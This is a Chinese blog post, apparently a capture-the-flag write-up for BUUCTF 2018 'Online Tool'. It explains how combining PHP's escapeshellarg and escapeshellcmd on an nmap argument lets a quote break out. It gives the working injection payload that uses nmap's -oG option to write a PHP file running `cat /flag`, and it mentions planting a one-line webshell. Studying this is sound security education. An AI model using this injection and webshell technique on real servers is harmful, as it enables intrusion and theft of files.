当前位置：首页 > news >正文

[BUUCTF 2018]Online Tool(特详解)

news 2026/1/12 0:14:05

这段代码块检查请求中是否设置了HTTP_X_FORWARDED_FOR头部。如果设置了，它将REMOTE_ADDR设置为HTTP_X_FORWARDED_FOR的值。这通常用于处理Web服务器位于代理后面的情况。

如果URL中未设置host参数，它使用highlight_file(__FILE__);来显示PHP文件的源代码。
将 $host 字符串传递给 escapeshellarg 后，它会在字符串周围添加单引号，并对一些特殊字符进行转义，以防止它们被解释为特殊命令。
escapeshellcmd 函数用于转义字符串，并删除任何特殊字符，使其安全用作单个命令。
如果设置了host参数，它获取该值，使用escapeshellarg和escapeshellcmd进行一些净化，创建基于客户端IP地址的唯一沙盒目录，然后在该沙盒内对指定的主机执行nmap命令。

注意：使用escapeshellarg和escapeshellcmd表明试图防止命令注入漏洞

chdir($sandbox);

chdir 函数用于改变当前的工作目录（Current Working Directory，CWD）为指定的目录。
在这里，$sandbox 是之前根据用户IP地址创建的沙盒目录的名称（通过 md5("glzjin" . $_SERVER['REMOTE_ADDR']) 计算得到的）。
这意味着 PHP 脚本的当前工作目录将被更改为用户特定的沙盒目录，后续的文件和命令将在这个目录下执行。

1，首先判断客户端提供给服务器和服务器自动获取的ip是否一致。 2，判断get host参数时候传值，没有传值高亮当前代码。 3，传值，host传递参数经过escapeshellarg，escapeshellcmd函数的限制。 4，以’glzjin’+ip通过md5加密形成值，并作为文件名创建文件，当前文件地址更改为创建的文件 5，输出 system执行结果。

通过其他师傅明白了点，原文PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)

1. 传入的参数是：`172.17.0.2' -v -d a=1`
2. 经过`escapeshellarg`处理后变成了`'172.17.0.2'\'' -v -d a=1'`，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。
3. 经过`escapeshellcmd`处理后变成`'172.17.0.2'\\'' -v -d a=1\'`，这是因为`escapeshellcmd`对`\`以及最后那个**不配对儿**的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php
4. 最后执行的命令是`curl '172.17.0.2'\\'' -v -d a=1\'`，由于中间的`\\`被解释为`\`而不再是转义字符，所以后面的`'`没有被转义，与再后面的`'`配对儿成了一个空白连接符。所以可以简化为`curl 172.17.0.2\ -v -d a=1'`，即向`172.17.0.2\`发起请求，POST 数据为`a=1'`。

但是经过上面的函数处理后变成了一个被单引号包围的字符串，不会当命令去执行，这里我们需要闭合一个单引号。

nmap有一个参数-oG可以实现将命令和结果写到文件

所以我们可以控制自己的输入写入文件，这里我们可以写入一句话木马链接，也可以直接命令 cat flag

flag

?host=' <?php echo `cat /flag`;?> -oG test.php '

这里注意用反引号cat /flag

然后直接读取

其实这里我是不太懂的，因为查資料escapeshellcmd会

反斜线（\）会在以下字符之前插入： *&#;`|*?~<>^()[]{}$*, \x0A 和 \xFF。 ' 和 " 仅在不配对儿的时候被转义。在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。

那么运行结果会是这样的

\<\?php echo \`cat /flag\`\;\?\> -oG test.php

这个在php文件怎么执行呢？

然后

nmap -T5 -sT -Pn --host-timeout 2 -F  \<\?php echo \`cat /flag\`\;\?\> -oG test.php

在 Linux 中，反斜杠（\）是转义字符，用于改变后面字符的原始意义。它告诉解释器后面的字符应该被特殊对待，而不是按照其原始含义解释。\\ 表示一个反斜杠字符。

就目前来看可以看到\都没有了只剩下了<?php echo `cat /flag`;?>

那一切都合理了\在linux中其实相当于无实义连接符

[BUUCTF 2018]Online Tool(特详解)

相关文章：

[BUUCTF 2018]Online Tool(特详解)

Qt Design Studio+Pyside项目

软件门槛之算法

第八篇【传奇开心果系列】beeware的toga开发移动应用示例：实现消消乐安卓手机小游戏

【MySQL】MySQL内置函数--日期函数/字符串函数/数学函数/其他相关函数

应急响应红蓝工程师白帽子取证Linux和windows入侵排查还原攻击痕迹，追溯攻击者，以及各种木马和病毒以及恶意脚本文件排查和清除

vue项目使用element-plus

Fastbee物联网项目新手快速入门

Linux 网络流量相关工具

KMP算法关于next数组详解

【Docker】数据持久化挂载

redis-主从复制

知识产权如何转为实缴资本，实操

docker-compose安装

「典型安全漏洞系列」06.路径遍历(Path Traversal)详解

【Android Gradle 插件】Gradle 参考文档收集

Controller的部分注解

CMake简明教程笔记

使用 sorted set 实现令牌桶限流

云上高可用系统-韧性设计模式

SpringBoot-17-MyBatis动态SQL标签之常用标签

云计算——弹性云计算器（ECS）

前端倒计时误差!

【解密LSTM、GRU如何解决传统RNN梯度消失问题】

linux arm系统烧录

江苏艾立泰跨国资源接力：废料变黄金的绿色供应链革命

【git】把本地更改提交远程新分支feature_g

HTML前端开发：JavaScript 常用事件详解

微信小程序云开发平台MySQL的连接方式

Spring AI与Spring Modulith核心技术解析